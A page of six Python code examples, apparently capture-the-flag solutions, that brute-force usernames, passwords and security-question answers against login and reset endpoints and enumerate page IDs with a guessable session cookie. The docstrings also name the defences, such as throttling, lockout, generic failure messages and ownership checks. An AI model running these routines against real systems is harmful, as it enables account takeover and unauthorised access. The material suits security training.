예제 #1
def crack_username(ip, instance_id):
    """
    Send one login request per candidate username and return the candidates judged valid.

    Each attempt is judged from the response body using the marker ``>Invalid username<``. The check
    only works while the application answers differently for unknown and known accounts; a uniform
    failure message plus attempt throttling removes that signal.

    :param ip: host handed to ``HttpRequest`` as the request target
    :param instance_id: first path segment; joined with ``ENDPOINT`` to form the request path
    :return: the result of ``h.parallel_attack`` (per the original docstring, the valid usernames)
    """
    invalid_marker = r">Invalid username<"
    target_path = "/".join([instance_id, ENDPOINT])
    base_request = HttpRequest(ip, method=HttpMethod.POST, path=target_path, headers=HEADERS)
    # Candidates are read from the word list file; 20 worker threads issue the requests.
    run_options = {"data_file": "uname_list.txt", "threads": 20}
    # NOTE(review): the True flag presumably tells f() to keep attempts whose response does NOT
    # contain the marker - confirm against f()'s definition.
    return h.parallel_attack(
        base_request,
        generate_uname_req,
        f(invalid_marker, True),
        **run_options
    )
예제 #2
def crack_password(ip, instance_id, username):
    """
    Send one login request per candidate password for a known username and return the valid ones.

    Each attempt is judged from the response body using the marker ``Combination is invalid``.
    Attempt throttling or account lockout on the login endpoint is what stops this kind of
    repeated guessing.

    :param ip: host handed to ``HttpRequest`` as the request target
    :param instance_id: first path segment; joined with ``ENDPOINT_LOGIN`` to form the request path
    :param username: account name passed to ``get_passwd_func`` to build the per-attempt requests
    :return: the result of ``h.parallel_attack`` (per the original docstring, the valid passwords)
    """
    failure_marker = r"Combination is invalid"
    login_path = "/".join([instance_id, ENDPOINT_LOGIN])
    base_request = HttpRequest(ip, method=HttpMethod.POST, path=login_path, headers=HEADERS)
    build_attempt = get_passwd_func(username)
    # NOTE(review): the candidate file is the one named for usernames - confirm it is the
    # intended list for password candidates.
    run_options = {"data_file": "uname_list.txt", "threads": 10}
    # NOTE(review): the True flag presumably tells f() to keep attempts whose response does NOT
    # contain the marker - confirm against f()'s definition.
    return h.parallel_attack(
        base_request,
        build_attempt,
        f(failure_marker, True),
        **run_options
    )
예제 #3
def crack_security_question(ip, instance_id, user_hash):
    """
    Send one reset request per candidate answer to a security question and return the valid ones.

    Each attempt is judged from the response body using the marker ``Invalid answer``. A reset flow
    that limits the number of answers per account and does not rely on low-entropy answers is not
    exposed to this kind of guessing.

    :param ip: host handed to ``HttpRequest`` as the request target
    :param instance_id: first path segment; joined with ``ENDPOINT_RESET`` to form the request path
    :param user_hash: user hash passed to ``get_reset_func`` to build the per-attempt requests
    :return: the result of ``h.parallel_attack`` (per the original docstring, the valid answers)
    """
    failure_marker = r"Invalid answer"
    reset_path = "/".join([instance_id, ENDPOINT_RESET])
    base_request = HttpRequest(ip, method=HttpMethod.POST, path=reset_path, headers=HEADERS)
    build_attempt = get_reset_func(user_hash)
    # NOTE(review): the candidate file is the one named for usernames - confirm it is the
    # intended list for security-question answers.
    run_options = {"data_file": "uname_list.txt", "threads": 10}
    # NOTE(review): the True flag presumably tells f() to keep attempts whose response does NOT
    # contain the marker - confirm against f()'s definition.
    return h.parallel_attack(
        base_request,
        build_attempt,
        f(failure_marker, True),
        **run_options
    )
예제 #4
def crack_password(ip, instance_id, username):
    """
    Send one login request per candidate password for a known username and return the valid ones.

    Each attempt is judged from the response body using the marker ``>Invalid password<``. A
    password-specific failure message tells the client that the username itself was accepted; a
    single generic failure message and attempt throttling remove both signals.

    :param ip: host handed to ``HttpRequest`` as the request target
    :param instance_id: first path segment; joined with ``ENDPOINT`` to form the request path
    :param username: account name passed to ``get_passwd_func`` to build the per-attempt requests
    :return: the result of ``h.parallel_attack`` (per the original docstring, the valid passwords)
    """
    invalid_marker = r">Invalid password<"
    login_path = "/".join([instance_id, ENDPOINT])
    base_request = HttpRequest(ip, method=HttpMethod.POST, path=login_path, headers=HEADERS)
    build_attempt = get_passwd_func(username)
    # The common-word list used for usernames is reused here as the password candidates; the
    # original author notes that a dedicated password list would suit a real application better.
    run_options = {"data_file": "uname_list.txt", "threads": 20}
    # NOTE(review): the True flag presumably tells f() to keep attempts whose response does NOT
    # contain the marker - confirm against f()'s definition.
    return h.parallel_attack(
        base_request,
        build_attempt,
        f(invalid_marker, True),
        **run_options
    )
예제 #5
def search_secret_page(ip, instance_id, max_page_num):
    """
    Request page IDs 0..max_page_num in turn and return the ID of the page that contains the flag.

    The IDs are plain consecutive integers, so the lookup succeeds only if the server returns a page
    to any caller who names its ID; a per-request ownership check on the server side closes that gap.

    :param ip: host handed to ``HttpRequest`` as the request target
    :param instance_id: first path segment; joined with ``ENDPOINT`` to form the request path
    :param max_page_num: highest page ID to request (inclusive); values below 1 fall back to 10
    :return: the result of ``h.parallel_attack`` (per the original docstring, the page ID if found)
    """
    upper_bound = 10 if max_page_num < 1 else max_page_num
    page_ids = list(range(upper_bound + 1))

    page_path = "/".join([instance_id, ENDPOINT])
    # NOTE(review): fixed session cookie. The value has the shape of an MD5 digest (32 hex chars)
    # and looks like the digest of a small integer - confirm. Identifiers derived that way are
    # guessable; randomly generated, server-issued session IDs are the fix.
    session_cookies = {"id": "c81e728d9d4c2f636f067f89cc14862c"}
    base_request = HttpRequest(
        ip,
        method=HttpMethod.GET,
        path=page_path,
        cookies=session_cookies,
    )
    flag_marker = r"\^FLAG\^"
    # NOTE(review): the False flag presumably tells f() to keep responses that DO contain the
    # marker - confirm against f()'s definition.
    return h.parallel_attack(
        base_request,
        generate_page_req,
        f(flag_marker, False),
        sequence=page_ids,
        threads=5,
    )
예제 #6
def crack_password(ip, instance_id, username):
    """
    Send one sign-in request per candidate password for a known username and return the valid ones.

    Requests are POSTed to ``ENDPOINT`` with the query parameter ``page=sign_in.php``, and each
    attempt is judged from the response body using the marker ``wrong username``. Attempt throttling
    or account lockout on the sign-in page is what stops this kind of repeated guessing.

    :param ip: host handed to ``HttpRequest`` as the request target
    :param instance_id: first path segment; joined with ``ENDPOINT`` to form the request path
    :param username: account name passed to ``get_passwd_func`` to build the per-attempt requests
    :return: the result of ``h.parallel_attack`` (per the original docstring, the valid passwords)
    """
    sign_in_path = "/".join([instance_id, ENDPOINT])
    sign_in_query = {"page": "sign_in.php"}
    base_request = HttpRequest(
        ip,
        method=HttpMethod.POST,
        path=sign_in_path,
        headers=HEADERS,
        params=sign_in_query,
    )
    # NOTE(review): the marker mentions the username although this routine varies the password -
    # confirm the exact text the application returns for a wrong password.
    failure_marker = r"wrong username"
    build_attempt = get_passwd_func(username)
    # NOTE(review): the candidate file is the one named for usernames - confirm it is the
    # intended list for password candidates.
    run_options = {"data_file": "uname_list.txt", "threads": 10}
    # NOTE(review): the True flag presumably tells f() to keep attempts whose response does NOT
    # contain the marker - confirm against f()'s definition.
    return h.parallel_attack(
        base_request,
        build_attempt,
        f(failure_marker, True),
        **run_options
    )